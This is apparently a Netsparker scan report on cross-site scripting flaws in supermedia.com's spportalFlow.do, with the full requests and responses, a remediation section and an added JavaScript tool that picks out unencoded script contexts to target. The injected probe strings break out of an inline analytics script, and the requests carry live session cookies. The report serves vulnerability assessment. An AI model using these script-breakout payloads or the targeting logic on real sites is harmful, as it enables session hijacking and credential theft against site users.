<img src="https://www.supermedia.com/spportal/cm/supermedia/homepage/image6/banner4.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/client-solutions" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Connect with customers'; s.tl(this,'o','Homepg: Connect with customers');" class="banner_link"></a>

<H2 class="new-white-header">Connect with your customers</H2>
<span class="new-white-subheader">We have advertising options tailored to meet your needs.</span>
<br/><br/><br/><br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">LEARN MORE &raquo;</span></div>
</DIV>
</LI>
</UL>

<span class="right-arrow" onclick="nextBanner(ind)">
<IMG alt="right" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/right-arrow.gif">
</span>
<span class="divider">
<IMG alt="" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/divider-line.gif">
</span>
<span class="pause" onclick="pauseBanner()">
<IMG alt="" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/pause-button.gif">
</span>
</DIV>



<div id="sign-in-form">
<div class = "formbox">

<h3>Client Sign In</h3>
<form id="signinform" name="signin" onkeypress="headerSignIn(event, this, '/spportal/indexLogin.do')"
action="/spportal/indexLogin.do" method="POST">
<table>
<tr>
<td width="70px">
<label>Email or ID:</label>
<br>
</td>
<td nowrap>
<input type="text" name="username" class="textfield" id="email-address" />
</td>
</tr>
<td>
<label>Password:</label>
</td>
<td>
<input type="password" name="password" class="textfield" id="password" AUTOCOMPLETE = "off"/>
<span class="subtext"><a href="javascript:void(0);" onclick="$('#signinform').attr('action','https://www.supermedia.com/spportal/forgotPwd.do');$('#signinform').submit();" title="Forgot password?">Forgot password?</a></span>
<div class="btn_grey"><a onkeypress="return false" href="javascript:checkRememberme();" title="Sign in">Sign in</a></div>
</td>
</tr>
</table>
</form>
<span id="bottom-remember">
<input id="hp_remember_me" name="checkbox" type="checkbox" value="checkbox" >Remember me
<br></span>
<span id="bottom"><a href="https://www.supermedia.com/help/account-information/sign-in" title="SNew Clients">New Users</a> | <a href="https://www.supermedia.com/help/account-information/sign-in" title="Sign in help">Sign in help</a></span>
</div>
</div>
[Possible] Permanent Cross-site Scripting

1 TOTAL
IMPORTANT

Permanent XSS (Cross-site Scripting) allows an attacker to execute dynamic scripts (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the current user's session, altering the look of the page by rewriting its HTML on the fly, and stealing the user's credentials. It happens because input supplied by a user is interpreted as HTML/JavaScript/VBScript by the browser.

Permanent means that the payload is stored in the back-end system. In a reflected XSS attack the attacker has to get the victim to open a crafted link (for example by e-mail); in a permanent XSS the attacker submits the payload once and waits for users to visit the affected page. As soon as someone does, the stored payload executes in their browser.

XSS targets the users of the application rather than the server. Although that is a limitation, since it only lets the attacker hijack other users' sessions, an attacker who targets an administrator can gain full control over the application.

Impact

Permanent XSS is a dangerous issue with many exploitation vectors, some of which include:
  • User session sensitive information such as cookies can be stolen.
  • XSS can enable client-side worms which could modify, delete or steal other users' data within the application.
  • The website can be redirected to a new location, defaced or used as a phishing site.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be validated and encoded. Output must be encoded for the format and location it is written into; typically that is HTML, but the same value may also land inside a script block or an attribute, and each of those contexts needs its own encoding. Where the output is HTML, ensure that all active content is removed or encoded before it is sent to the client's browser.

Before sanitizing user input, define the list of characters (or exact values) that are expected and acceptable and use it as a white-list. The list only needs to be defined once and should be used to validate all subsequent input; anything outside it is rejected rather than cleaned up.

A number of pre-defined, well-structured white-list and encoding libraries exist for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.

Remedy References

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?_flowExecutionKey=http://www.netsparker.com?

Unknown Injection Point

Netsparker did not carry out an attack against this page but identified the output of a previously completed XSS attack. This can happen when Netsparker has been run against this website before. In the response below the page body echoes exactly the value this request sent (http://www.netsparker.com?), entity-encoded, while the SiteCatalyst inline script writes a different, earlier probe (netsparker(0x000218)) unencoded into the s.prop7 string literal, and s.prop10 carries the same JSESSIONID as the request cookie. The earlier error message therefore appears to be kept in server-side state and re-emitted on later responses; verify this from a fresh session before treating the finding as confirmed.
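The following is an added example, not part of the Netsparker report or of the scanned site, showing how to triage a captured response such as the one below. It applies the browser's rule that a script element ends at the first </script regardless of JavaScript string state, locates every echo of the scanner's probe marker and of the current request's parameter value, reports the context (script or HTML) and encoding of each, and decides whether a raw probe is left over from an earlier run. The two sample bodies are constructed from the fragments this report shows for both spportalFlow.do findings, trimmed to the relevant lines; the marker pattern, the record layout and the function names are assumptions.

```javascript
// Added example; not part of the Netsparker report or of the scanned site.
// Triage of a captured HTTP response body: find every echo of the scanner's
// probe marker and of the current request's parameter value, and report
// whether each landed inside a <script> element or in ordinary HTML and
// whether it was entity-encoded. Sample bodies are constructed from report
// fragments; marker pattern, record layout and function names are assumptions.

const MARKER_RE = /netsparker\(0x[0-9a-f]{6}\)/gi;

// Entity encoding in the same style the scanned site used (&#039; for ').
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&#034;', "'": '&#039;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Emulate the HTML tokenizer: a <script> element's content ends at the first
// "</script" no matter what the JavaScript inside it was doing. That is how a
// payload containing "</script><script>" escapes a JS string literal.
function scriptRanges(html) {
  const ranges = [];
  const open = /<script\b[^>]*>/gi;
  const close = /<\/script/gi;
  let m;
  while ((m = open.exec(html)) !== null) {
    const start = m.index + m[0].length;
    close.lastIndex = start;
    const c = close.exec(html);
    const end = c ? c.index : html.length;
    ranges.push({ start, end });
    open.lastIndex = end;
  }
  return ranges;
}

function contextAt(ranges, idx) {
  return ranges.some(r => idx >= r.start && idx < r.end) ? 'script' : 'html';
}

// One record per echo, sorted by position. Verdict is 'stored' when a raw
// probe marker is present that the current request did not send (the
// "output of a previously completed attack" case), otherwise 'reflected'.
// `targets` lists the contexts where the current value appears unencoded,
// i.e. the places worth a hand-crafted payload.
function triage(html, currentValue) {
  const ranges = scriptRanges(html);
  const hits = [];
  for (const m of html.matchAll(MARKER_RE)) {
    hits.push({ kind: 'marker', value: m[0], index: m.index,
      context: contextAt(ranges, m.index), fromCurrentRequest: currentValue.includes(m[0]) });
  }
  const enc = htmlEncode(currentValue);
  const encodable = enc !== currentValue;           // no specials: encoding is undecidable
  const needles = [[currentValue, encodable ? false : null]];
  if (encodable) needles.push([enc, true]);
  for (const [needle, encoded] of needles) {
    for (let i = html.indexOf(needle); i !== -1; i = html.indexOf(needle, i + needle.length)) {
      hits.push({ kind: 'current', value: needle, index: i, context: contextAt(ranges, i), encoded });
    }
  }
  hits.sort((a, b) => a.index - b.index);
  const stored = hits.some(h => h.kind === 'marker' && !h.fromCurrentRequest);
  const targets = hits.filter(h => h.kind === 'current' && h.encoded === false).map(h => h.context);
  return { verdict: stored ? 'stored' : 'reflected', targets, hits };
}

// Constructed from the report's first response: the request sent
// _flowExecutionKey=http://www.netsparker.com? and the body echoes that, but
// the SiteCatalyst block still carries an earlier probe inside s.prop7.
const STORED_SAMPLE =
  '<script type="text/javascript">s.prop7="Badly formatted flow execution key ' +
  '\'\'"--></style></script><script>netsparker(0x000218)</script>\', the expected ' +
  'format is \'_c<conversationId>_k<continuationId>\'";s.prop8="";</script>' +
  '<div id="bodyfooterwrap"><h4>An Error has occurred in this application.</h4>' +
  'Badly formatted flow execution key &#039;http://www.netsparker.com?&#039;</div>';

// Constructed from the report's second response: the _flowId value is echoed
// raw inside the s.prop7 string literal and entity-encoded in the body.
const REFLECTED_PROBE = '\'"><net sparker=netsparker(0x00040C)>';
const REFLECTED_SAMPLE =
  '<script type="text/javascript">s.prop7="No such flow definition with id \'' +
  REFLECTED_PROBE + '\' found";s.prop8="";</script>' +
  '<div id="bodyfooterwrap">No such flow definition with id &#039;' +
  htmlEncode(REFLECTED_PROBE) + '&#039; found</div>';

function report(name, html, currentValue) {
  const r = triage(html, currentValue);
  console.log(`${name}: verdict=${r.verdict} targets=[${r.targets}]`);
  for (const h of r.hits) console.log(`  @${h.index} ${h.context.padEnd(6)} ${h.kind} ${h.value}`);
  return r;
}

function main() {
  report('stored', STORED_SAMPLE, 'http://www.netsparker.com?');      // verdict=stored
  report('reflected', REFLECTED_SAMPLE, REFLECTED_PROBE);             // verdict=reflected targets=[script]
}
main();
```

For the first sample the only raw marker is one the current request never sent, so the tool reports it as stored; for the second, the body copy is encoded and the script copy is not, which is the context a manual payload should go after.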

Request

GET /spportal/spportalFlow.do?_flowExecutionKey=http://www.netsparker.com? HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:58:24 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 5759






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="Badly formatted flow execution key ''"--></style></script><script>netsparker(0x000218)</script>', the expected format is '_c<conversationId>_k<continuationId>'";s.prop8="";s.prop9="";s.prop10="E1AC2AA3159FB94ADA25D554A846EBD5.app6-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
Badly formatted flow execution key &#039;http://www.netsparker.com?&#039;, the expected format is &#039;_c&lt;conversationId&gt;_k&lt;continuationId&gt;&#039;
</div>

</div>
</div>
<div >























<!-- Footer Start -->

<!-- DROP DOWN START -->
<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover(function(){
clearDropDownTimer();
});
});
</script>
<!-- DROP DOWN END -->
<div id="footer" >




<div id="sitemap">

<div class="block first">


<h4>Company:</h4>
<ul>
<li><a href="https://www.supermedia.com/about-us" title="About Us">About Us</a></li>
<li><a href="https://www.supermedia.com/press" title="Press">Press</a></li>
<li><a href="http://ir.supermedia.com" title="Investors">Investors</a></li>
<li><a href="https://www.supermedia.com/careers" title="Careers">Careers</a></li>
<li><a href="https://www.supermedia.com/social-responsibility" title="Social Responsibility">Social Responsibility</a></li>
<li><a href="http://my.supermedia.com/directoryoptout" title="Directory Opt-out">Directory Opt-out</a></li>
</ul>



<h4>Client Solutions:</h4>
<ul>
<li><a href="https://www.supermedia.com/client-solutions/client-stories" title="Client Stories">Client Stories</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-service" title="Local Services">Local Services</a></li>
<li><a href="https://www.supermedia.com/client-solutions/local-retail" title="Local Retailers">Local Retailers</a></li>
<li><a href="https://www.supermedia.com/client-solutions/web-based-business" title="Web Businesses">Web Businesses</a></li>
<li><a href="https://www.supermedia.com/client-solutions/national-brand-agencies" title="National Brands & Agencies">National Brands &amp; Agencies</a></li>
<li><a href="https://www.supermedia.com/advertising-goals" title="Advertising Goals...">Advertising Goals...</a></li>
<li><a href="https://www.supermedia.com/client-solutions/share-the-wealth" title="Share the Wealth">Share the Wealth</a></li>
</ul>
</div>
<div class="block">
<h4>Media Network:</h4>
<ul>
<li><a href="https://www.supermedia.com/media-network/our-brands" title="Our Brands">Our Brands</a></li>
&..
[Possible] Cross-site Scripting

1 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This opens up several attack opportunities, most commonly hijacking the current user's session or altering the look of the page by rewriting its HTML on the fly to steal the user's credentials. It happens because input supplied by a user is interpreted as HTML/JavaScript/VBScript by the browser.

Netsparker believes that there is an XSS (Cross-site Scripting) vulnerability here but could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed. In the response below the _flowId value is echoed twice: entity-encoded in the page body, and unencoded inside the s.prop7 string literal of the SiteCatalyst inline script, where a double quote in the value terminates the literal. That script context, not the body, is the place to verify manually.

XSS targets the users of the application rather than the server. Although that is a limitation, since it only lets the attacker hijack other users' sessions, an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input to and output from the application should be validated and encoded. Output must be encoded for the format and location it is written into; a value written into a script block needs different encoding from one written into HTML text.

A number of pre-defined, well-structured white-list and encoding libraries exist for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.

Remedy References

External References

- /spportal/spportalFlow.do

/spportal/spportalFlow.do

https://www.supermedia.com/spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=..

Parameters

Parameter    Type   Value
fromPage     GET    index
username     GET    Ronald Smith
password     GET    3
(no name)    GET    3
_flowId      GET    '"><net sparker=alert(0x00040C)>

Request

GET /spportal/spportalFlow.do?fromPage=index&username=Ronald%20Smith&password=3&=3&_flowId='%22%3E%3Cnet%20sparker=netsparker(0x00040C)%3E HTTP/1.1
Referer: https://www.supermedia.com/spportal/indexLogin.do
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=EF46B22FE38C1DFD3796C73A1E51B52E.app5-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a42378b; trafficSource=default; CstrStatus=U
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 12:00:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en
Connection: close
Content-Encoding:
Content-Length: 6272






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<!-- UI framework designed and implemented by Advertiser Portal UI Team -->

<title>SuperPages - Error</title>



















<link rel="stylesheet" type="text/css" href="style/global.css" >
<link rel="stylesheet" type="text/css" href="style/form.css" >
<!--[if IE]>
<link rel="stylesheet" type="text/css" href="style/iehack.css" >
<![endif]-->
<script src="js/jquery/jquery.js" type="text/javascript"></script>
<script type="text/javascript" language="JavaScript" src="js/header.js"></script>
<script type="text/javascript" language="JavaScript" src="js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="js/popupBlockerDetection.js"></script>
<script type="text/javascript" src="js/jquery/blockui.js"></script>





<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="" onunload="" onbeforeunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/indexLogin.do";s.pageName="";s.prop1="Processing Error Title";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="General Exception";s.prop7="No such flow definition with id ''"><net sparker=netsparker(0x00040C)>' found; the flows available are: array<String>['accountAdmin-flow', 'accountreg-flow', 'businessprofile-flow', 'client-consolidation-flow', 'contactus-flow', 'coupon-flow', 'forgotpassword-edit-flow', 'funding-flow', 'lead-maintain-flow', 'listingOrderSummary-flow', 'login-flow', 'loginact-flow', 'maintaincreditcard-flow', 'microsite-flow', 'myaccount-contactinfo-edit-flow', 'myaccount-domains-flow', 'myaccount-email-edit-flow', 'myaccount-emails-flow', 'myaccount-flow', 'myaccount-password-edit-flow', 'myaccount-websites-flow', 'onlinecc-flow', 'ordersummary-flow', 'paypercall-flow', 'pfc-businessprofile-flow', 'pfc-flow', 'pfp-adDesign-flow', 'pfp-categories-flow', 'pfp-elp-flow', 'pfp-geo-flow', 'pfp-keywords-flow', 'photos-flow', 'ppc-advsearch-flow', 'ppc-bidding-flow', 'ppc-create-flow', 'ppc-fullservice-flow', 'ppc-maintain-flow', 'repmanagement-flow', 'reviews-flow', 'sclicks-maintain-flow', 'sharethewealth-flow', 'temporary-password-flow', 'webhosting-addons-flow', 'webhosting-design-flow', 'webhosting-domainnames-flow', 'webhosting-email-products-flow', 
'webhosting-websites-flow']";s.prop8="";s.prop9="";s.prop10="EF46B22FE38C1DFD3796C73A1E51B52E.app5-a1";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="js/mbox.js"></script>
<div >





























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





</div>
<div id="content-shadow" >
<div id="content" >

<!-- Setting the omniture page name --><script type="text/javascript" language="javascript"> s.pageName="Processing Error Title";</script>
<div id="bodyfooterwrap">
<h4>
An Error has occurred in this application. Please try back at a later time.
</h4>
